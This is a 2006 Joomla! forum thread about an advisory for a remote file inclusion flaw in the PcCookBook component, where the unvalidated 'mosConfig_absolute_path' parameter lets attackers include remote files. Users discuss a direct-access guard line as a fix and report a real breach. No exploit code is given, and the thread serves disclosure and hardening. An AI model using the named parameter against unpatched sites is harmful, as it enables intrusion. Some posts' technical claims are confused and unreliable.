The Joomla! Forum ™





Post new topic Reply to topic  [ 15 posts ] 
Author Message
PostPosted: Tue Jul 11, 2006 2:02 pm 
User avatar
Joomla! Explorer
Joomla! Explorer

Joined: Fri Aug 19, 2005 12:51 pm
Posts: 427
Location: Argentina
Quote:
Advisory ID : FrSIRT/ADV-2006-2739
CVE ID : GENERIC-MAP-NOMATCH
Rated as : High Risk
Remotely Exploitable : Yes
Locally Exploitable : Yes
Release Date : 2006-07-11

Technical Description

A vulnerability has been identified in PcCookBook (component for Joomla!), which may be exploited by attackers to execute arbitrary commands. This flaw is due to an input validation error in the "pccookbook.php" script that fails to validate the "mosConfig_absolute_path" parameter, which could be exploited by remote attackers to include malicious files and execute arbitrary commands with the privileges of the web server.

Affected Products

PcCookBook (component for Joomla!) version 1.3.1 and prior


http://www.frsirt.com/english/advisories/2006/2739

Have a nice day
Gustavo

_________________
Comunidad Joomla: Maintenance, support, translation and distribution for the Joomla!. Help site online. Member of the Spanish [es_ES] Joomla Translation Team. http://comunidadjoomla.org


Last edited by RobS on Thu Aug 10, 2006 8:33 pm, edited 1 time in total.

Top
 Profile  
 
PostPosted: Tue Jul 11, 2006 3:03 pm 
User avatar
Joomla! Master
Joomla! Master

Joined: Fri Aug 12, 2005 3:47 pm
Posts: 17238
Location: **Translation Matters**
Thanks for the head up.

_________________
Jean-Marie Simonet / infograf · http://www.info-graf.fr
Multilanguage in 2.5: http://help.joomla.org/files/EN-GB_multilang_tutorial.pdf
---------------------------------
Joomla Translation Coordination Team • Joomla! Production Working Group


Top
 Profile  
 
PostPosted: Wed Jul 12, 2006 2:29 am 
User avatar
Joomla! Guru
Joomla! Guru

Joined: Wed Aug 17, 2005 11:26 pm
Posts: 903
This is the same vulnerability that exists in some of the other 3PD components we have been discussing.
The files do not include:

Code:
// Don't allow direct linking
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );


Any component/module extension that allows direct access to the code should be considered vulnerable.

_________________
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info


Top
 Profile  
 
PostPosted: Sun Jul 30, 2006 12:10 pm 
Joomla! Enthusiast
Joomla! Enthusiast

Joined: Thu Aug 18, 2005 8:43 pm
Posts: 182
actually, the pccookbook does include this command...

however, it does not prevent the attack.


Top
 Profile  
 
PostPosted: Sun Jul 30, 2006 2:15 pm 
User avatar
Joomla! Master
Joomla! Master

Joined: Fri Aug 12, 2005 3:47 pm
Posts: 17238
Location: **Translation Matters**
Looked in pccookbook.php file in pccookbook 1.3.1 (last available version)
Quote:

//pc_cookbook Component//
/**
* Content code
* @package hello_world
* Original @Copyright (C) 2005 Robert Prince
* @Copyright (C) 2005 Konstantinos (koyan) Kokkorogiannis
* @ All rights reserved
* @ pc_cookbook is Free Software
* @ Released under GNU/GPL License : http://www.gnu.org/copyleft/gpl.html
* @version koyans 0.3
* @link http://www.dianthos.net & http://www.fisheye.gr/koyansblog
**/
global $mosConfig_absolute_path;
global $mosConfig_live_site;

etc.


The file looks vulnerable to me.

Same for include.pccookbbok.php

_________________
Jean-Marie Simonet / infograf · http://www.info-graf.fr
Multilanguage in 2.5: http://help.joomla.org/files/EN-GB_multilang_tutorial.pdf
---------------------------------
Joomla Translation Coordination Team • Joomla! Production Working Group


Top
 Profile  
 
PostPosted: Mon Jul 31, 2006 12:48 am 
Joomla! Enthusiast
Joomla! Enthusiast

Joined: Thu Aug 18, 2005 8:43 pm
Posts: 182
I admit it should have been the first line... but the die line was included, further down in the code.


Top
 Profile  
 
PostPosted: Mon Jul 31, 2006 9:04 am 
User avatar
Joomla! Master
Joomla! Master

Joined: Fri Aug 12, 2005 3:47 pm
Posts: 17238
Location: **Translation Matters**
Kindred wrote:
I admit it should have been the first line... but the die line was included, further down in the code.



Result is useless placed this way.

_________________
Jean-Marie Simonet / infograf · http://www.info-graf.fr
Multilanguage in 2.5: http://help.joomla.org/files/EN-GB_multilang_tutorial.pdf
---------------------------------
Joomla Translation Coordination Team • Joomla! Production Working Group


Top
 Profile  
 
PostPosted: Mon Jul 31, 2006 2:11 pm 
Joomla! Enthusiast
Joomla! Enthusiast

Joined: Thu Aug 18, 2005 8:43 pm
Posts: 182
actually, I placed the die command at the top...  but they still got in through that door. :(

I have removed the PCCookBook from my site pending further analysis


Top
 Profile  
 
PostPosted: Fri Sep 01, 2006 1:18 pm 
Joomla! Fledgling
Joomla! Fledgling

Joined: Fri Sep 01, 2006 5:02 am
Posts: 3
Kindred,

What do you mean, "they still got in through that door"?  Do you mean someone hacked your site through pccookbook?  Who is they, and how do you know that it was pccookbook that let them in?  Also, was this a clean system, or already compromised?  Did you only add the "defined ... die ...." line to pccookbook.php, or also to include.pccookbook.php and admin.phpcookbook.php, or to all php files?

I guess where I'm going is, how do we know that adding the "defined ... die ...." line at the top of the files won't fix this vulnerability?  I'd like to see this module fixed, and it seems easy to just add that line to the top of every file.  In fact, I've already done this.

For infograf768, is there any reason to not put this line at the top of every php file?

Thanks,
Tony


Top
 Profile  
 
PostPosted: Fri Sep 01, 2006 2:17 pm 
User avatar
Joomla! Master
Joomla! Master

Joined: Fri Aug 12, 2005 3:47 pm
Posts: 17238
Location: **Translation Matters**
@Tonyhill
Welcome on our forums.

I am no coder, but I do know it is not always useful to put the line.
Depends if the code in the file calls some globals settings.

On whether it would harm or not to put it systematically, no idea.
I guess one has to test the functionalities of the extension.

I'll ask a real coder to come here and reply to your question.

_________________
Jean-Marie Simonet / infograf · http://www.info-graf.fr
Multilanguage in 2.5: http://help.joomla.org/files/EN-GB_multilang_tutorial.pdf
---------------------------------
Joomla Translation Coordination Team • Joomla! Production Working Group


Top
 Profile  
 
PostPosted: Fri Sep 01, 2006 3:43 pm 
Joomla! Fledgling
Joomla! Fledgling

Joined: Fri Sep 01, 2006 5:02 am
Posts: 3
Thanks!

I do understand that XSS is still a problem whenever reading a file from a variable name.  Another question for a Joomla! coder is this: how does one typically guard against XSS when needing to reference the $mosConfig_absolute_path?  It doesn't seem like I can assume that every Joomla! install must have the modules installed on the same server as the rest of Joomla!, or can I?

I am new to Joomla!, so I don't know how all the ways in which it can be deployed.  If I can assume that every Joomla! install has the modules installed on the same server as the rest of Joomla!, then I can just check the URI to see if it goes to the same place.  Otherwise, I'm not sure of a good way to check this variable.

Finally, as I look through the security vulnerabilities, I see this one occurs commonly.  Would it be smart for Joomla! to provide a secure include function for modules -- one that is immune to XSS?


Top
 Profile  
 
PostPosted: Fri Sep 01, 2006 3:57 pm 
User avatar
Joomla! Master
Joomla! Master

Joined: Fri Aug 12, 2005 3:47 pm
Posts: 17238
Location: **Translation Matters**
Reply from real coder:
On whether it would harm or not to put it systematically, the answer is no, concerning the functionalities.
It may be unsuficient though to protect against all type of sql injections.

It does protect against some xss attacks based around require's, which were those we have seen lately.

Concerning your other questions, please look at the dev site
http://dev.joomla.org/component/option, ... Itemid,32/

There is something there concerning hardening extensions.
Yes, all extensons are not only on the same server but in the same root folder.

_________________
Jean-Marie Simonet / infograf · http://www.info-graf.fr
Multilanguage in 2.5: http://help.joomla.org/files/EN-GB_multilang_tutorial.pdf
---------------------------------
Joomla Translation Coordination Team • Joomla! Production Working Group


Top
 Profile  
 
PostPosted: Fri Sep 01, 2006 4:16 pm 
Joomla! Fledgling
Joomla! Fledgling

Joined: Fri Sep 01, 2006 5:02 am
Posts: 3
Thank you very much for the information.

I see that I was using XSS incorrectly above.  What I should have said was remote file injection.

I will go through pccookbook and see if I can apply all of the methods suggested in the security section of the developer documentation.  After I'm done, I'll be sure to contact the author of pccookbook and post something here for others to examine.


Top
 Profile  
 
PostPosted: Thu Sep 07, 2006 6:02 pm 
Joomla! Enthusiast
Joomla! Enthusiast

Joined: Thu Aug 18, 2005 8:43 pm
Posts: 182
BTW: I am very certain that they got in via the cookbook, because my server secuirty logs showed it to be so...


Top
 Profile  
 
PostPosted: Fri Oct 05, 2007 7:39 pm 
Joomla! Fledgling
Joomla! Fledgling

Joined: Fri Oct 05, 2007 7:31 pm
Posts: 2
infograf768 wrote:
Kindred wrote:
I admit it should have been the first line... but the die line was included, further down in the code.



Result is useless placed this way.


Why is it useless? I placed it in the first line lots of times.. and indeed.. it didn't work.. but why?

Best regards

_________________
The nose of a mob is its imagination. By this, at any time, it can be quietly led.
marine beneficial association


Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 15 posts ] 



Who is online

Users browsing this forum: No registered users and 2 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  
Powered by phpBB® Forum Software © phpBB Group